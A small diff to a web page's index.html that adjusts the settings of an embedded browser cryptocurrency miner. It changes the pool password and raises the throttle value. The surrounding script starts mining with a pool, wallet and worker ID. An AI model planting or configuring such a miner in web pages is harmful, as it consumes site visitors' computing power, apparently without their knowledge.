--- a/index.html
+++ b/index.html
@@ -34,11 +34,11 @@
 
     var threads = -1;
 
-    var password = "";
+    var password = "x";
 
     startMining(pool, walletAddress, workerId, threads, password);
 
-    throttleMiner = 20;
+    throttleMiner = 25;
 
 </script>
 
